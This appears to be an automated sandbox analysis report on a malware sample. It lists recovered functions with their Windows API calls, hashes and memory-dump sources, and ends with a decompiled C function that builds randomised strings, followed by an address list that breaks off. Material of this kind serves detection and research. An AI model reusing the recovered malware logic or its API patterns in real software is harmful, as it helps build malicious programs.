                              • Opcode Fuzzy Hash: b00f6c2c2b317200b4df36fb0d2d9535ef4eec563accf75279d71b7b26469fc0
                              • Instruction Fuzzy Hash: 3F41EAB9A00128FFEF12EFA4CDC59EEBBBCFB44240F10407AE645A7151DA756E058B61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01043F93, Relevance: 21.2, APIs: 14, Instructions: 201memorystringthreadCOMMON
                              Download Yara Rule
                              APIs
                              • StrChrA.SHLWAPI(?,0000002C), ref: 01043FE2
                              • StrTrimA.SHLWAPI(00000001,?), ref: 01043FFB
                              • StrChrA.SHLWAPI(?,0000002C), ref: 01044006
                              • StrTrimA.SHLWAPI(00000001,?), ref: 0104401F
                              • lstrlen.KERNEL32(?), ref: 010440B7
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 010440D9
                              • lstrcpy.KERNEL32(00000020,?), ref: 010440F8
                              • lstrlen.KERNEL32(?), ref: 01044102
                              • memcpy.NTDLL(?,?,?), ref: 01044143
                              • memcpy.NTDLL(?,?,?), ref: 01044156
                              • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 0104417A
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01044199
                              • HeapFree.KERNEL32(00000000,?), ref: 010441BF
                              • HeapFree.KERNEL32(00000000,?), ref: 010441DB
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                              • String ID:
                              • API String ID: 3323474148-0
                              • Opcode ID: f9bf19e82ddf6c772e00aa904e52bffe09dc6e566497d42ddeacca0e59eab275
                              • Instruction ID: 5382f3b518edfbc995c82d9e7a917f996507196eaca62ea71f6f8465255d5ac9
                              • Opcode Fuzzy Hash: f9bf19e82ddf6c772e00aa904e52bffe09dc6e566497d42ddeacca0e59eab275
                              • Instruction Fuzzy Hash: 197158B1204301AFE721DF68D884B5BBBE9BB88304F04492EFAC6D3250D775E554CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01041D86, Relevance: 21.2, APIs: 14, Instructions: 161memorystringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,?,00000000), ref: 01041D9D
                              • lstrlen.KERNEL32(?,?,00000000), ref: 01041DA4
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01041DBB
                              • lstrcpy.KERNEL32(00000000,?), ref: 01041DCC
                              • lstrcat.KERNEL32(?,?), ref: 01041DE8
                              • lstrcat.KERNEL32(?,?), ref: 01041DF9
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01041E0A
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01041EA7
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 01041EE0
                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 01041EF9
                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 01041F03
                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 01041F13
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 01041F2C
                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 01041F3C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                              • String ID:
                              • API String ID: 333890978-0
                              • Opcode ID: 669e51c0c5e721362cad1418d0252399c4ddbcce393716000e05cb04df52ce3b
                              • Instruction ID: 452be0f3d3a5a68826119b15e654b1ee3011d20668e20d5bdd006f0c3f3bdd49
                              • Opcode Fuzzy Hash: 669e51c0c5e721362cad1418d0252399c4ddbcce393716000e05cb04df52ce3b
                              • Instruction Fuzzy Hash: E4519CBA500208FFDB219FA8DDC4CAE7BBDFB48344B054065F68597124D73A9A46CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103FA4B, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 128timeCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0103FA8D
                              • OpenWaitableTimerA.KERNEL32(00100000,00000000,0102FCCC), ref: 0103FAA0
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,0102FCCC,00000000,?), ref: 0103FBB8
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • memset.NTDLL ref: 0103FAC3
                              • memcpy.NTDLL(?,000493E0,00000010,?,?,00000040,?,?,?,?,?,?,0102FCCC,00000000,?), ref: 0103FB42
                              • RtlEnterCriticalSection.NTDLL(?), ref: 0103FB57
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0103FB6F
                              • GetLastError.KERNEL32(01047313,?,?,?,?,?,?,?,00000040,?,?,?,?,?,?,0102FCCC), ref: 0103FB87
                              • RtlEnterCriticalSection.NTDLL(?), ref: 0103FB93
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0103FBA2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
                              • String ID: 0x%08X$W
                              • API String ID: 1559661116-2600449260
                              • Opcode ID: fbdad835c89378b46abdc4b27415b7e1c624586079268f445d8efed08be28079
                              • Instruction ID: 6ce76ace2f62eedc4d751a2c900c298630d1eccde8d714d1c0afbbd19931c0a1
                              • Opcode Fuzzy Hash: fbdad835c89378b46abdc4b27415b7e1c624586079268f445d8efed08be28079
                              • Instruction Fuzzy Hash: 1E415CB590020AEFDB21DFA8C984A9EBBFCFF08344F108569F689D7250D3759A44CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01033FE6, Relevance: 21.1, APIs: 14, Instructions: 107libraryloaderstringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?,00000000,?,?,?,01025A61,?,?), ref: 01033FF3
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,01025A61,?,?), ref: 0103401C
                              • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0103403C
                              • lstrcpyW.KERNEL32(-00000002,?), ref: 01034057
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,01025A61,?,?), ref: 01034063
                              • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,01025A61,?,?), ref: 01034066
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,01025A61,?,?), ref: 01034072
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103408F
                              • GetProcAddress.KERNEL32(00000000,?), ref: 010340A9
                              • GetProcAddress.KERNEL32(00000000,?), ref: 010340BF
                              • GetProcAddress.KERNEL32(00000000,?), ref: 010340D5
                              • GetProcAddress.KERNEL32(00000000,?), ref: 010340EB
                              • GetProcAddress.KERNEL32(00000000,?), ref: 01034101
                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,01025A61,?,?), ref: 0103412A
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                              • String ID:
                              • API String ID: 3772355505-0
                              • Opcode ID: 5b758bbabbfb48bb704a4c2a3bd9d0c887fd6be316a54adf9427986ae913e03c
                              • Instruction ID: 51854c46d144d071adf20ab9edd9b89dfcf76f219cfd4d02d02a08e2503e67a4
                              • Opcode Fuzzy Hash: 5b758bbabbfb48bb704a4c2a3bd9d0c887fd6be316a54adf9427986ae913e03c
                              • Instruction Fuzzy Hash: B7312BB160070AEFD7209F65ED84D6B7BECFF44384B044866B985C7215EB7AE804CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010295C5, Relevance: 21.1, APIs: 14, Instructions: 79stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?,?,00000000,?,?,?,0102F8BF,?,?,?), ref: 010295DC
                              • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,0102F8BF,?,?,?), ref: 010295E7
                              • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,0102F8BF,?,?,?), ref: 010295EF
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01029604
                              • lstrcpyW.KERNEL32(00000000,?), ref: 01029615
                              • lstrcatW.KERNEL32(00000000,?), ref: 01029627
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,0102F8BF,?,?,?), ref: 0102962C
                              • lstrcatW.KERNEL32(00000000,0104A3F0), ref: 01029638
                              • lstrcatW.KERNEL32(00000000), ref: 01029640
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,0102F8BF,?,?,?), ref: 01029645
                              • lstrcatW.KERNEL32(00000000,0104A3F0), ref: 01029651
                              • lstrcatW.KERNEL32(00000000,00000002), ref: 0102966C
                              • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,0102F8BF,?,?,?), ref: 01029674
                              • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,0102F8BF,?,?,?), ref: 01029682
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                              • String ID:
                              • API String ID: 3635185113-0
                              • Opcode ID: 4c7f40597a6425f6bb165c79be903d266d74de8f4e7446f987d8d234281867d7
                              • Instruction ID: 9ea94083a4dbed25e16a77bebd95b2145c18eb6fa0e325d9d734650c1371e54f
                              • Opcode Fuzzy Hash: 4c7f40597a6425f6bb165c79be903d266d74de8f4e7446f987d8d234281867d7
                              • Instruction Fuzzy Hash: E221DB76280225EFE3316B58DC88E6BBBA8EF89B45F01001DF68283114DB6A9805CB65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102F3F5, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 110librarymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(?), ref: 0102F415
                              • TlsAlloc.KERNEL32 ref: 0102F41F
                              • LoadLibraryA.KERNEL32(?), ref: 0102F448
                              • LoadLibraryA.KERNEL32(?), ref: 0102F456
                              • LoadLibraryA.KERNEL32(?), ref: 0102F464
                              • LoadLibraryA.KERNEL32(?), ref: 0102F472
                              • LoadLibraryA.KERNEL32(?), ref: 0102F480
                              • LoadLibraryA.KERNEL32(?), ref: 0102F48E
                              • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 0102F4B8
                              • HeapFree.KERNEL32(00000000,?,?,?,0000000C,00000000), ref: 0102F539
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Load$Library$AllocDll@4FreeHeapImports
                              • String ID: ~
                              • API String ID: 1792504554-1707062198
                              • Opcode ID: dbf78c06d3f7ca7795f18cc126fc87471dd279f769af84005bbda1ebc4f0c163
                              • Instruction ID: 3102ed8b064aad162295568fc2ed7a0d1fa75b0aac970ec0b90636edddf4678c
                              • Opcode Fuzzy Hash: dbf78c06d3f7ca7795f18cc126fc87471dd279f769af84005bbda1ebc4f0c163
                              • Instruction Fuzzy Hash: 7441617190022AEFDB20DFA8D9C4D9EBBF8FB08340F0404A6F685D7148DB7AA905CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010283B5, Relevance: 18.2, APIs: 12, Instructions: 195memorystringthreadCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0102DA7D: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0102DAC2
                                • Part of subcall function 0102DA7D: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0102DADA
                                • Part of subcall function 0102DA7D: WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DBA2
                                • Part of subcall function 0102DA7D: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DBCB
                                • Part of subcall function 0102DA7D: HeapFree.KERNEL32(00000000,010283DE,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DBDB
                                • Part of subcall function 0102DA7D: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DBE4
                              • lstrcmp.KERNEL32(?,?), ref: 0102842C
                              • HeapFree.KERNEL32(00000000,?), ref: 01028458
                              • GetCurrentThreadId.KERNEL32 ref: 01028509
                              • GetCurrentThread.KERNEL32 ref: 0102851A
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,010395A5,?,00000001), ref: 01028556
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,010395A5,?,00000001), ref: 0102856A
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 01028578
                              • wsprintfA.USER32 ref: 01028590
                                • Part of subcall function 010428B5: lstrlen.KERNEL32(?,00000000,01048C1F,?,010212D8,?), ref: 010428BF
                                • Part of subcall function 010428B5: lstrcpy.KERNEL32(00000000,?), ref: 010428E3
                                • Part of subcall function 010428B5: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,010212D8,?), ref: 010428EA
                                • Part of subcall function 010428B5: lstrcat.KERNEL32(00000000,?), ref: 01042941
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0102859B
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 010285B2
                              • HeapFree.KERNEL32(00000000,00000000), ref: 010285C3
                              • HeapFree.KERNEL32(00000000,?), ref: 010285CF
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                              • String ID:
                              • API String ID: 773763258-0
                              • Opcode ID: b2bb1b959638fb974e3afb062a43521a691213198fd9d5670a6b937f6431a48e
                              • Instruction ID: 8c37b4d3f1a439c675a597266d34859749ebcaf73b5389c348f9869565bc66b6
                              • Opcode Fuzzy Hash: b2bb1b959638fb974e3afb062a43521a691213198fd9d5670a6b937f6431a48e
                              • Instruction Fuzzy Hash: 11711875900229EFDB61DF98D884EEEBBF9FF08350F04805AF585A7224D735A945CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102FAF3, Relevance: 18.2, APIs: 12, Instructions: 183synchronizationstringthreadCOMMON
                              Download Yara Rule
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0102FB1A
                              • memcpy.NTDLL(?,?,00000010), ref: 0102FB3D
                              • memset.NTDLL ref: 0102FB89
                              • lstrcpyn.KERNEL32(?,?,00000034), ref: 0102FB9D
                              • GetLastError.KERNEL32 ref: 0102FBCB
                              • GetLastError.KERNEL32 ref: 0102FC12
                              • GetLastError.KERNEL32 ref: 0102FC31
                              • WaitForSingleObject.KERNEL32(?,000927C0), ref: 0102FC6B
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 0102FC79
                              • GetLastError.KERNEL32 ref: 0102FCF3
                              • ReleaseMutex.KERNEL32(?), ref: 0102FD05
                              • RtlExitUserThread.NTDLL(?), ref: 0102FD1B
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                              • String ID:
                              • API String ID: 4037736292-0
                              • Opcode ID: e9ea37a0c3de7d9f249f87ef23913efe9221b98dcb14178a01ab00fb27f00025
                              • Instruction ID: 2e8626864c23dab388524d4c4126b8ca9107949ff427f43768558fa7fd83383d
                              • Opcode Fuzzy Hash: e9ea37a0c3de7d9f249f87ef23913efe9221b98dcb14178a01ab00fb27f00025
                              • Instruction Fuzzy Hash: 2561AAB0504306AFD3619F29DA48A1BBBF8BF88750F108A19FAE2C3284D775E504CF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103BD94, Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000,74785520,?,00000000,?,?,?), ref: 0103BDAA
                              • lstrlen.KERNEL32(?), ref: 0103BDB2
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0103BDC2
                              • lstrcpy.KERNEL32(00000000,?), ref: 0103BDE1
                              • lstrlen.KERNEL32(?), ref: 0103BDF6
                              • lstrlen.KERNEL32(?), ref: 0103BE04
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 0103BE52
                              • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0103BE76
                              • lstrlen.KERNEL32(?), ref: 0103BEA9
                              • HeapFree.KERNEL32(00000000,?,?), ref: 0103BED4
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0103BEEB
                              • HeapFree.KERNEL32(00000000,?,?), ref: 0103BEF8
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                              • String ID:
                              • API String ID: 904523553-0
                              • Opcode ID: 5956f7f2d7ee5a909088db06b8f2ee069f1789807aeb23b4c7830f3dcf34e742
                              • Instruction ID: 4efa24bca55aae0a5a9f5758091e60140125eae7386990073047b4a48c7ae420
                              • Opcode Fuzzy Hash: 5956f7f2d7ee5a909088db06b8f2ee069f1789807aeb23b4c7830f3dcf34e742
                              • Instruction Fuzzy Hash: E5418C7690020AFFDF229FA8CC84AAE7BBAFF84314F104069FA9197150D735E911DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01032AB7, Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON
                              Download Yara Rule
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 01032AE9
                              • WaitForSingleObject.KERNEL32(00000760,00000000), ref: 01032B0B
                              • ConnectNamedPipe.KERNEL32(?,?), ref: 01032B2B
                              • GetLastError.KERNEL32 ref: 01032B35
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01032B59
                              • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,00000010,00000000), ref: 01032B9C
                              • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 01032BA5
                              • WaitForSingleObject.KERNEL32(00000000), ref: 01032BAE
                              • CloseHandle.KERNEL32(?), ref: 01032BC3
                              • GetLastError.KERNEL32 ref: 01032BD0
                              • CloseHandle.KERNEL32(?), ref: 01032BDD
                              • RtlExitUserThread.NTDLL(000000FF), ref: 01032BF3
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                              • String ID:
                              • API String ID: 4053378866-0
                              • Opcode ID: 0636687b339093ee667bf6f937ee4773a64de8240c8c4433557f2a668272e711
                              • Instruction ID: 16cc9670bcb4271bfd45bf53f752ca4502f1b00df86e5d8fc4ac620cec1e733e
                              • Opcode Fuzzy Hash: 0636687b339093ee667bf6f937ee4773a64de8240c8c4433557f2a668272e711
                              • Instruction Fuzzy Hash: 7A3162B0544305EFE7219F28C9889AFBBADFB84354F000A29F5D5D20A4D7799A058B52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01042F15, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 119memorythreadstringCOMMON
                              Download Yara Rule
                              APIs
                              • RtlImageNtHeader.NTDLL(00000000), ref: 01042F3F
                              • GetCurrentThreadId.KERNEL32 ref: 01042F55
                              • GetCurrentThread.KERNEL32 ref: 01042F66
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D62B
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D644
                                • Part of subcall function 0103D619: GetCurrentThreadId.KERNEL32 ref: 0103D651
                                • Part of subcall function 0103D619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01042F93,00000000,?,00000000,010243B5,?,?,?,?,?,010243B5,00000000), ref: 0103D65D
                                • Part of subcall function 0103D619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D66B
                                • Part of subcall function 0103D619: lstrcpy.KERNEL32(00000000), ref: 0103D68D
                                • Part of subcall function 0102C585: lstrlen.KERNEL32(00000000,00000001,00000000,?,00000000,00000001,00000000,00000000,74785520,00000000,?,01042FAF,00000020,00000000,?,00000000), ref: 0102C5F0
                                • Part of subcall function 0102C585: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000001,00000000,00000000,74785520,00000000,?,01042FAF,00000020,00000000,?,00000000), ref: 0102C618
                              • HeapFree.KERNEL32(00000000,?,00000000,?,?,00000020,00000000,?,00000000,?,00000000,010243B5), ref: 01042FDF
                              • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,010243B5,?,?,?,?,?,010243B5,00000000), ref: 01042FEB
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0104303A
                              • wsprintfA.USER32 ref: 01043052
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,010243B5,00000000), ref: 0104305D
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,010243B5,00000000), ref: 01043074
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                              • String ID: W
                              • API String ID: 630447368-655174618
                              • Opcode ID: 988416e66c21cf25cddd36f8b9a608cb22a798ccce4f118bb8b863c5df15d3de
                              • Instruction ID: 6a31d95058513c560a5382de6e006dde6bcc00b0e6727359cd8d1ef8fb802f9a
                              • Opcode Fuzzy Hash: 988416e66c21cf25cddd36f8b9a608cb22a798ccce4f118bb8b863c5df15d3de
                              • Instruction Fuzzy Hash: 48416CB5A00229FBDB219FA5EC88DAF7FB9FF08344F004065F98597118D7369A50DB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01032BFA, Relevance: 16.7, APIs: 11, Instructions: 155registrystringfileCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 01032C25
                                • Part of subcall function 0102267F: RegCloseKey.ADVAPI32(?,?,01032C45,00000000,00000000,?), ref: 01022706
                              • RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 01032C60
                              • lstrcpyW.KERNEL32(-00000002,?), ref: 01032CC1
                              • lstrcatW.KERNEL32(00000000,?), ref: 01032CD6
                              • lstrcpyW.KERNEL32(?), ref: 01032CF0
                              • lstrcatW.KERNEL32(00000000,?), ref: 01032CFF
                                • Part of subcall function 01039CA7: lstrlenW.KERNEL32(00000000,00000000,?,01032D1E,00000000,?), ref: 01039CBA
                                • Part of subcall function 01039CA7: lstrlen.KERNEL32(?,?,01032D1E,00000000,?), ref: 01039CC5
                                • Part of subcall function 01039CA7: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01039CDA
                              • RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 01032D69
                                • Part of subcall function 010347C6: lstrlenW.KERNEL32(80000001,761506E0,01048A01,80000001,?,?,0102360B,?), ref: 010347D2
                                • Part of subcall function 010347C6: memcpy.NTDLL(00000000,00000002,00000000,00000002,?,?,0102360B,?), ref: 010347FA
                                • Part of subcall function 010347C6: memset.NTDLL ref: 0103480C
                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?), ref: 01032D9E
                              • GetLastError.KERNEL32 ref: 01032DA9
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01032DBF
                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 01032DD1
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                              • String ID:
                              • API String ID: 1430934453-0
                              • Opcode ID: adfc05d64178872036117c5c58baf71c3bcc07e6d8a7abcf3f0a43a6e812b3a0
                              • Instruction ID: 7d773a43f040da7d3af4207ddb2127a32b185468cf02310f3f7b6d28fa8586b1
                              • Opcode Fuzzy Hash: adfc05d64178872036117c5c58baf71c3bcc07e6d8a7abcf3f0a43a6e812b3a0
                              • Instruction Fuzzy Hash: 48514D7590021AEBDB21EFA4DD88EEE7BBDFF55340B100565F980D7114D7369A01DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E5D44, Relevance: 16.6, APIs: 11, Instructions: 145stringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 55%
                              			E013E5D44(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				WCHAR* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				WCHAR* _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				WCHAR* _t125;

				_t58 =  *0x13ed36c; // 0x3ad9818
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E013E67ED();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E013E67ED();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E013E3C00(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E013E3C00(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E013EA725(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x13ec1ac;
						}
						_t70 = E013E4FFE(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E013E55DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x13ed2b8; // 0x26ea5a8
								_t28 = _t105 + 0x13eeae8; // 0x530025
								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E013EA725(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x13ec1b0;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E013E55DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E013E6DFA(_v24);
								} else {
									_t92 =  *0x13ed2b8; // 0x26ea5a8
									_t44 = _t92 + 0x13eec60; // 0x73006d
									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E013E6DFA(_v8);
						}
						E013E6DFA(_v12);
					}
					E013E6DFA(_v16);
				}
				return _v28;
			}


































                              0x013e5d4a
                              0x013e5d52
                              0x013e5d55
                              0x013e5d62
                              0x013e5d65
                              0x013e5d6c
                              0x013e5d73
                              0x013e5d76
                              0x013e5d83
                              0x013e5d86
                              0x013e5d89
                              0x013e5d90
                              0x013e5d93
                              0x013e5d9b
                              0x013e5da2
                              0x013e5da5
                              0x013e5dab
                              0x013e5daf
                              0x013e5db8
                              0x013e5dbc
                              0x013e5dbe
                              0x013e5dbe
                              0x013e5dc6
                              0x013e5dcd
